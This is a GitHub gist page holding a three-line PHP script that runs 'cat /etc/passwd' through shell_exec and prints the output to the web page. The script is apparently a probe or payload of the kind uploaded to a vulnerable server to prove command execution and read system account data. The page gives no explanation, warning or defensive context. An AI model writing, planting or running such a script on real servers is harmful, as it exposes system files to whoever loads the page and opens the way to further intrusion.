Skip to content

Instantly share code, notes, and snippets.

@kabukki
Last active March 9, 2017 13:08
Show Gist options
  • Save kabukki/dc5c1aeb0ac91dd6607d21bf8839e37c to your computer and use it in GitHub Desktop.
Save kabukki/dc5c1aeb0ac91dd6607d21bf8839e37c to your computer and use it in GitHub Desktop.
<?php
$out = shell_exec('cat /etc/passwd');
echo $out;
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment